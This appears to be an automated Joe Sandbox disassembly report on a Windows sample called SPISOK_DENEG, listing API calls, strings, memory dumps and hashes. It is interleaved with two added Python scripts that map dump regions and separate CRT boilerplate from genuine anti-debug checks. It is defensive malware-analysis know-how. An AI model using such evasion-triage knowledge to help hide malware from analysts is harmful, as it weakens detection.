                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 79727d2cf4512fbefde8ba8ddb56fe7200128bc33df7c00395692735e222f2b6
                                                            • Instruction ID: a0685b6973c4edab55face3cda7930adb0d60d7c3842157555535b54d265eae3
                                                            • Opcode Fuzzy Hash: 79727d2cf4512fbefde8ba8ddb56fe7200128bc33df7c00395692735e222f2b6
                                                            • Instruction Fuzzy Hash: F3A012D21580C57CF01413529D02C3B010CC1C0B10330461EF405900C16D8008080870
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,000EAE72,C:\Users\user\Desktop,00000000,0011946A,00000006), ref: 000EAC08
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: c22effb9cce3912fc43afedb86d14df723f1d4c64bceb70d300c5c55de8c00cb
                                                            • Instruction ID: 340f354684be7bec78dd6db0b5a651775572fa000c01fdc6e05c5fe1b1512901
                                                            • Opcode Fuzzy Hash: c22effb9cce3912fc43afedb86d14df723f1d4c64bceb70d300c5c55de8c00cb
                                                            • Instruction Fuzzy Hash: C3A011302002008BC2000B328F0AA0EBAAAAFA2B00F00C028A08080030CB30C8A0AA00
                                                            APIs
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,000D95D6,?,?,?,?,?,00102641,000000FF), ref: 000D963B
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 1fdc88f8d8be7959f4fa839979ae0219f2e7f14299c8c53a2238a6659dacc4d7
                                                            • Instruction ID: 1efeead05c36704f7d805f4e738a4303ecdd58c7a0fd3b43f0fa02cf2e04ef1f
                                                            • Opcode Fuzzy Hash: 1fdc88f8d8be7959f4fa839979ae0219f2e7f14299c8c53a2238a6659dacc4d7
                                                            • Instruction Fuzzy Hash: 24F08970485B159FDB308A24C458792B7E86B12331F045B5FE0F742AE0D761A5CD8B60
                                                            APIs
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 000EC2B1
                                                            • EndDialog.USER32(?,00000006), ref: 000EC2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 000EC2E0
                                                            • SetFocus.USER32(00000000), ref: 000EC2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 000EC321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 000EC358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 000EC36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000EC38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 000EC39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 000EC3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000EC3D4
                                                            • _swprintf.LIBCMT ref: 000EC404
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 000EC417
                                                            • FindClose.KERNEL32(00000000), ref: 000EC41E
                                                            • _swprintf.LIBCMT ref: 000EC477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 000EC48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 000EC4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 000EC4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 000EC4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 000EC4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000EC509
                                                            • _swprintf.LIBCMT ref: 000EC535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 000EC548
                                                            • _swprintf.LIBCMT ref: 000EC59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 000EC5AF
                                                              • Part of subcall function 000EAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000EAF35
                                                              • Part of subcall function 000EAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0010E72C,?,?), ref: 000EAF84
                                                            Strings
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            • Opcode ID: 622b6cd1cbe82a2afbf6f61eba2f2b41ecd376bdbdfe680b4c20546b72ae5a9d
                                                            • Instruction ID: 3e46f3cd749c66ea9d14292b478b46cd522425135a26e6ad62831eb63bd953c3
                                                            • Opcode Fuzzy Hash: 622b6cd1cbe82a2afbf6f61eba2f2b41ecd376bdbdfe680b4c20546b72ae5a9d
                                                            • Instruction Fuzzy Hash: 32917372248388BFE2219BA1CC49FFB77ECEB49700F044819F785D6581D775AA458B72
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D6FAA
                                                            • _wcslen.LIBCMT ref: 000D7013
                                                            • _wcslen.LIBCMT ref: 000D7084
                                                              • Part of subcall function 000D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000D7AAB
                                                              • Part of subcall function 000D7A9C: GetLastError.KERNEL32 ref: 000D7AF1
                                                              • Part of subcall function 000D7A9C: CloseHandle.KERNEL32(?), ref: 000D7B00
                                                              • Part of subcall function 000DA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,000D977F,?,?,000D95CF,?,?,?,?,?,00102641,000000FF), ref: 000DA1F1
                                                              • Part of subcall function 000DA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,000D977F,?,?,000D95CF,?,?,?,?,?,00102641), ref: 000DA21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 000D7139
                                                            • CloseHandle.KERNEL32(00000000), ref: 000D7155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 000D7298
                                                              • Part of subcall function 000D9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000D73BC,?,?,?,00000000), ref: 000D9DBC
                                                              • Part of subcall function 000D9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 000D9E70
                                                              • Part of subcall function 000D9620: CloseHandle.KERNELBASE(000000FF,?,?,000D95D6,?,?,?,?,?,00102641,000000FF), ref: 000D963B
                                                              • Part of subcall function 000DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA501
                                                              • Part of subcall function 000DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA532
                                                            Strings
                                                            Similarity
                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3983180755-3508440684
                                                            • Opcode ID: 4044368c459def41f5a95a705a604aa1a526a7489bf06a982a82e1eff5db0c8e
                                                            • Instruction ID: 66412d23d5fce0b29a41bdd4bd1002c046d76c3d314d9a8e0a5d1bff45e83638
                                                            • Opcode Fuzzy Hash: 4044368c459def41f5a95a705a604aa1a526a7489bf06a982a82e1eff5db0c8e
                                                            • Instruction Fuzzy Hash: B7C19471904748AADB25DB74DC41FEEB7ACAF04300F00455BFA5AA7382E775AB848B71
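The "Memory Dump Source" lines above name seven dumps of the same mapped module. The file names carry, in hex, the region base address and two winnt.h values: the page protection (0x02 PAGE_READONLY for the headers at 000D0000, 0x20 PAGE_EXECUTE_READ for the code at 000D1000, 0x04 PAGE_READWRITE for the data regions) and the region type (0x01000000 MEM_IMAGE). Together with "Offset: 000D0000, based on PE: true" they reconstruct the section layout of the loaded PE, which tells a reviewer which dump to run Yara or a string search over and which dump a given "ref:" address from the API lists falls in. The script below is an added example, not part of this report or of Joe Sandbox's own tooling: it decodes those names and maps an address such as 000EF910 to its region. The field order of the .sdmp name is my reading of the names on this page, not a documented format, and region sizes are not in the name, so the address lookup assumes each region runs up to the next dump's base; the winnt.h constants themselves are standard.

```python
import re

# Windows memory constants from winnt.h (standard values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED field order of a Joe Sandbox .sdmp name, inferred from the names on this page:
#   <proc>.<stage>.<timestamp>.<base>.<protect>.<state>.<type>.<index>.sdmp
DUMP_NAME = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<stamp>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<index>[0-9A-F]{8})\.sdmp$",
    re.IGNORECASE,
)

IMAGE_BASE = 0xD0000  # "Offset: 000D0000, based on PE: true" in the report

# The dump names listed for this sample on the page (copied from the report, not constructed).
DUMP_NAMES = [
    "00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp",
]


def decode_dump_name(name):
    """Decode one .sdmp name into base address, RVA, page protection and region type."""
    m = DUMP_NAME.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    base = int(m["base"], 16)
    protect = int(m["protect"], 16)
    mem_type = int(m["type"], 16)
    return {
        "name": name,
        "base": base,
        "rva": base - IMAGE_BASE,
        "protect": PAGE_PROTECT.get(protect & 0xFF, f"0x{protect:X}"),
        "type": MEM_TYPE.get(mem_type, f"0x{mem_type:X}"),
        "executable": bool(protect & EXECUTE_MASK),
    }


def module_layout(names):
    """Sort the dumps by base; for MEM_IMAGE regions this recovers the PE section layout."""
    return sorted((decode_dump_name(n) for n in names), key=lambda r: r["base"])


def dump_for_address(names, address):
    """Pick the dump that contains a 'ref:' address from the API lists.
    Sizes are not in the name, so each region is taken to extend to the next dump's base
    (the highest region is open-ended); addresses below the first base return None."""
    layout = module_layout(names)
    if not layout or address < layout[0]["base"]:
        return None
    chosen = None
    for region in layout:
        if region["base"] <= address:
            chosen = region
    return chosen


if __name__ == "__main__":
    for r in module_layout(DUMP_NAMES):
        print(f"{r['base']:08X}  rva {r['rva']:06X}  {r['protect']:<22} {r['type']}")
    hit = dump_for_address(DUMP_NAMES, 0xEF910)  # IsDebuggerPresent ref from this report
    print("ref 000EF910 lies in", hit["name"], hit["protect"])
```

Only the 000D1000 dump is marked executable, so that is the one to disassemble or scan for code signatures; the three PAGE_READWRITE dumps are where runtime-decrypted strings and configuration would land.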
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 59a1b1d010dadcf19bb61b7cb1279d99f2b59adfd5022f2d5d95e65626c8e968
                                                            • Instruction ID: 5c4a09e02d43b38dbd3dc61fe0c8aa945096ecb095a76761dc7131476fc2a3a5
                                                            • Opcode Fuzzy Hash: 59a1b1d010dadcf19bb61b7cb1279d99f2b59adfd5022f2d5d95e65626c8e968
                                                            • Instruction Fuzzy Hash: 7FC24771E0826C8FDB65CE28DD407EAB3B5EB84304F1441EADA4DE7651E774AE81AF40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: 995a312bd4c4cac218a10ef34b44be459964d4205aaba9f2033af5205c484113
                                                            • Instruction ID: 06575569ea4e08c806cb71024eece40ef93c67fd9bd755a0e6a0530eea8a650a
                                                            • Opcode Fuzzy Hash: 995a312bd4c4cac218a10ef34b44be459964d4205aaba9f2033af5205c484113
                                                            • Instruction Fuzzy Hash: 06329071514385ABEB18DF74C895AEA3BA5AF15300F04447EFD8A8B383DB74A649CB31
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D2874
                                                            • _strlen.LIBCMT ref: 000D2E3F
                                                              • Part of subcall function 000E02BA: __EH_prolog.LIBCMT ref: 000E02BF
                                                              • Part of subcall function 000E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000DBAE9,00000000,?,?,?,00010480), ref: 000E1BA0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D2F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: 3685fa3a9bc23f668e77ce9a85fbf5be1f92d332fbd2c48f291b9305241a555b
                                                            • Instruction ID: b71abac4eff5c40701c56b89516cca675760228741a4dd8b480e77ce3b59e0e3
                                                            • Opcode Fuzzy Hash: 3685fa3a9bc23f668e77ce9a85fbf5be1f92d332fbd2c48f291b9305241a555b
                                                            • Instruction Fuzzy Hash: 4862E1719003458FDB19DF24C896AEA7BA1AF64310F08447FED9A8B383DB759945CB70
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000EF844
                                                            • IsDebuggerPresent.KERNEL32 ref: 000EF910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000EF930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 000EF93A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 61f58430e1beb7b28a8a5db929c765b25bd995efe4ffe29a11d250db81036aff
                                                            • Instruction ID: a9d04f6bb25f2a980ee9262ac4d4d2b74c703848aa6781ab6ed7ae1e018e5212
                                                            • Opcode Fuzzy Hash: 61f58430e1beb7b28a8a5db929c765b25bd995efe4ffe29a11d250db81036aff
                                                            • Instruction Fuzzy Hash: 0F312975D0521D9FDB21DFA5D9897CCBBF8AF08304F1040AAE44CAB251EBB19B848F45
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,000EE5E8,0000001C,000EE7DD,00000000,?,?,?,?,?,?,?,000EE5E8,00000004,00131CEC,000EE86D), ref: 000EE6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,000EE5E8,00000004,00131CEC,000EE86D), ref: 000EE6CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: 6b47be282f15a79cc7cb8bff183c034ea369d18be8846ec1581950ce0b12f0ed
                                                            • Instruction ID: 8718c92555e820bd481388b66b0e093fa3a47408c90242f43687bd6c0be84244
                                                            • Opcode Fuzzy Hash: 6b47be282f15a79cc7cb8bff183c034ea369d18be8846ec1581950ce0b12f0ed
                                                            • Instruction Fuzzy Hash: B201F73260014D6BDB14DE29DC09BDE7BEAAFC4324F0CC120ED99E7154D634D9458680
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000F8FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000F8FBF
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 000F8FCC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: eef373cc08acbd7a06bf15d521c1ea759dffa44a640374167dbd48dcc80d60e4
                                                            • Instruction ID: 72a6cd7387ff1cf3cac6f97ef3212a6d04212899fceef03a4f3d3ae900e59958
                                                            • Opcode Fuzzy Hash: eef373cc08acbd7a06bf15d521c1ea759dffa44a640374167dbd48dcc80d60e4
                                                            • Instruction Fuzzy Hash: C931D27590122DABCB21DF65DC88BDCBBB8AF08310F5041EAE41CA7261EB709F858F44
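The two function entries above (refs 000EF910 and 000F8FB5) both show IsDebuggerPresent followed, in order, by SetUnhandledExceptionFilter(0) and UnhandledExceptionFilter; the first additionally probes IsProcessorFeaturePresent(0x17), which is PF_FASTFAIL_AVAILABLE. That ordered sequence is the MSVC C runtime's own fault-reporting routine (the code behind abort() and the security-check failure handler) and is compiled into essentially every MSVC binary, so these two hits on their own do not substantiate the "checks if a debugger is running" signature from the summary; the IsDebuggerPresent worth reversing is one that is not followed by that pair. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses "APIs" bullets in the format printed on this page, groups them per function and applies that rule, and it names the IsProcessorFeaturePresent feature numbers seen on this page (0x0A is PF_XMMI64_INSTRUCTIONS_AVAILABLE, the CRT's SSE2 probe). The first two input blocks are copied from this page; the third (IsDebuggerPresent followed by Sleep) is constructed to show the non-CRT case. The verdict labels and helper names are my own.

```python
import re
from dataclasses import dataclass

# One "APIs" bullet as the Joe Sandbox IDA plugin prints it:
#   • Name.MODULE(arg,arg,...), ref: ADDR      or      • Name.MODULE ref: ADDR
API_LINE = re.compile(
    r"•\s*(?P<api>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# IsProcessorFeaturePresent() feature numbers that appear on this page (winnt.h values).
PROCESSOR_FEATURES = {
    0x0A: "PF_XMMI64_INSTRUCTIONS_AVAILABLE",  # SSE2 probe, CRT floating-point init
    0x17: "PF_FASTFAIL_AVAILABLE",             # __fastfail probe, CRT fault-report path
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


def parse_entries(report_text):
    """Group the '•' bullets under each 'APIs' header into one list of ApiCall per function.
    Indented 'Part of subcall function' bullets belong to a callee and are skipped."""
    entries, current = [], None
    for raw in report_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            current = []
            entries.append(current)
            continue
        if current is None:
            continue
        if not line.startswith("•"):
            current = None          # 'Strings', 'Memory Dump Source', ... close the list
            continue
        if "Part of subcall function" in line:
            continue
        m = API_LINE.search(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            current.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
    return [calls for calls in entries if calls]


def classify(calls):
    """'crt_report_fault' when IsDebuggerPresent is followed, in order, by
    SetUnhandledExceptionFilter(NULL) and UnhandledExceptionFilter: that is the MSVC CRT's
    own abort/fault-report routine, not a check written by the malware author.
    Any other IsDebuggerPresent use is returned as 'review_anti_debug'."""
    names = [c.api for c in calls]
    if "IsDebuggerPresent" not in names:
        return "other"
    try:
        i_dbg = names.index("IsDebuggerPresent")
        i_set = names.index("SetUnhandledExceptionFilter")
        i_unh = names.index("UnhandledExceptionFilter")
    except ValueError:
        return "review_anti_debug"
    if i_dbg < i_set < i_unh and calls[i_set].args[:1] == ["00000000"]:
        return "crt_report_fault"
    return "review_anti_debug"


def processor_features(calls):
    """Name the IsProcessorFeaturePresent() feature numbers a function probes."""
    names = []
    for c in calls:
        if c.api == "IsProcessorFeaturePresent" and c.args and c.args[0] != "?":
            n = int(c.args[0], 16)
            names.append(PROCESSOR_FEATURES.get(n, f"PF_{n}"))
    return names


def analyze(report_text):
    """Return one summary dict per function found in the report text."""
    return [
        {
            "first_ref": calls[0].ref,
            "apis": [c.api for c in calls],
            "features": processor_features(calls),
            "verdict": classify(calls),
        }
        for calls in parse_entries(report_text)
    ]


# Input: the first two blocks are copied from this report; the third is CONSTRUCTED to show
# an IsDebuggerPresent that is not part of the CRT sequence.
SAMPLE_REPORT = """\
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000EF844
• IsDebuggerPresent.KERNEL32 ref: 000EF910
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000EF930
• UnhandledExceptionFilter.KERNEL32(?), ref: 000EF93A
Memory Dump Source
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000F8FB5
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000F8FBF
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 000F8FCC
Memory Dump Source
APIs
• IsDebuggerPresent.KERNEL32 ref: 00401000
• Sleep.KERNEL32(00001388), ref: 00401010
Memory Dump Source
"""

if __name__ == "__main__":
    for entry in analyze(SAMPLE_REPORT):
        print(f"{entry['first_ref']:08X}  {entry['verdict']:<18} {entry['features']}  {entry['apis']}")
```

Run over the whole function listing of a report, this leaves only the IsDebuggerPresent sites that are not CRT boilerplate, which for a packed sample is where the real evasion logic, if any, sits; the same triage applies to the IsProcessorFeaturePresent and RaiseException(C000000D, STATUS_INVALID_PARAMETER) entries further down, which are also CRT-originated.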
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction ID: a25b6c5a9c2aa35ed587409a29ade66e622c37f3139867d68e0ede3c72b20673
                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction Fuzzy Hash: 83022E71E002199FDF14DFA9C8806ADB7F2EF88314F25426AD919EB780D731AD41DB90
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000EAF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,0010E72C,?,?), ref: 000EAF84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
